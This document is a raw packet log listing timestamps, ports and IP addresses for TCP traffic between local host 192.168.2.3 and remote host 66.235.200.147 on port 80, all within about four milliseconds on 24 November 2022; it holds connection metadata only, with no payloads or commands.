Nov 24, 2022 12:20:03.371967077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371988058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.371990919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372006893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372015953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372025013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372035027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372044086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372051001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372064114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372071028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372082949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372087002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372102022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372107029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372119904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372121096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372138023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372139931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372157097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372159004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372175932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372178078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372191906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372196913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372216940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372220993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372231960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372235060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372251987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372253895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372271061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372272015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372289896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372291088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372307062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372311115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372329950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372334003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372347116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372349024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372365952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372366905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372385025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372385979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372402906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372406006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372422934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372423887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372442007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372442007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372459888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372462034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372476101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372478008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372493982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372497082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372514009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372514963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372530937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372534037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372551918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372567892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372571945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372579098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372590065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372596979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372608900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372620106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372627020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372637033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372646093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372658014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372664928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372673988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372683048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372689962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372701883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372720003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372735023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372740030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372757912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372759104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.372757912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372780085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.372809887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373174906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373195887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373214006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373233080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373253107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373256922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373271942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373291016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373295069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373308897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373317957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373341084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373342991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373358011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373375893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373385906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373409986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373418093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373454094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373557091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373591900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373601913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373610973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373630047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373636961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373647928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373656034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373667955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373675108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373686075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373693943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373711109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373727083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373831034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373866081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373873949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373886108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373905897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373908997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373924017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373941898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373950005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373950005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373960018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373969078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373979092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.373986006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.373996973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374005079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374017000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374023914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374036074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374042034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374054909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374059916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374073982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374078035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374092102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374093056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374110937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374110937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374130964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374138117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374150038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374167919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374172926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374172926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374186993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374191999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374205112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374211073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374222994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374229908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374242067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374253035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374259949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374273062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374278069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374289036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374298096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374305964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374315977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374322891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374335051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374340057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374352932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374356985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374371052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374377012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374389887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374394894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374408960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374412060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374428034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374428034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374447107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374448061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374465942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374465942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374484062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374485970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374505043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374510050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374522924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374527931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374542952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374546051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374561071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374567032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374582052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374583006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374599934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374599934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374619961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374620914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374638081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374655962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374660015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374660015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374675035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374676943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374690056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374696970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374706984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374713898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374726057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374732018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374744892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374761105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374763012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374780893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374783039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374797106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374804974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374815941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374834061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374840975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374852896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374865055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374865055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374870062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374902964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374922991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374939919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374939919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374942064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374962091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374973059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374973059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.374980927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.374994993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375000000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375009060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375019073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375025034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375036955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375042915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375056028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375065088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375075102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375082016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375093937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375098944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375113010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375129938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375133991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375149012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375154018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375166893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375184059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375188112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375201941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375204086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375219107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375228882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375236034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375248909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375252962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375264883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375271082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375281096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375289917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375299931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375308037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375315905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375324965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375333071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375344038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375349998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375361919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375366926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375380993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375386000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375399113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375406027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375416994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375420094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375435114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375446081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375452995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375461102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375473022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375479937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375493050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375498056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375510931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375514984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375530005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375531912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375547886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375550985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375566006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375575066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375585079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375586987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375602961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375602961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375622034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375624895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375641108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375641108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375658035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375659943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375678062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375698090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375700951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375719070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375724077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375736952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375751972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375755072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375778913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375796080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375796080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375797987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375809908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375816107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375825882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375834942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375839949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375854015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375858068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375871897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375879049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375890970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375895023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375911951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375914097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375931025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375932932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375950098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375953913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.375968933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375968933 CET	49710	80	192.168.2.3	66.235.200.147
